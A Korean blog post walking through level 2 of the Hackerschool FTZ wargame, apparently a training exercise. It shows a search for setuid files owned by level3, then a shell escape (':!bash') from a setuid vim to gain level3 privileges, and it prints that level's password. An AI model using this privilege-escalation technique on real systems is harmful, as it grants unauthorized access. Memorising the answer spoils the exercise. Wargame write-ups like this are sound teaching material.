티스토리 뷰
먼저 파일을 확인 하고, hint 파일을 보니 다음과 같다.
[level2@ftz level2]$ ls
hint public_html tmp
[level2@ftz level2]$ cat hint
텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...
[level2@ftz level2]$
find
를 이용해 찾아보자
[level2@ftz level2]$ find / -user level3 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$ ls -al /usr/bin/editor
-rwsr-x--- 1 level3 level2 11651 Sep 10 2011 /usr/bin/editor
level3권한이 걸려있는 editor라는 이름의 프로그램을 실행해보면 vim이 나온다.
level1->level2와 같이 편집 프로그램 실행 중 외부 명령어를 실행시켜보자
~
~
~
~
~
~
~
~
~ VIM - Vi IMproved
~
~ version 6.1.320
~ by Bram Moolenaar et al.
~ Vim is open source and freely distributable
~
~ Help poor children in Uganda!
~ type :help iccf<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version6<Enter> for version info
~
~
~
~
~
~
~
~
~
:!bash
위처럼 쉘을 실행시켜보니
[level3@ftz level2]$
level3권한의 쉘이 실행된 것을 확인할 수 있다. 이후 my-pass를 실행하면 된다.
Level3 Password is "can you fly?".
'Hackerschool Wargame > FTZ' 카테고리의 다른 글
FTZ level3 -> level4 (4) | 2018.09.28 |
---|---|
FTZ level1 -> level2 (1) | 2018.09.26 |
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday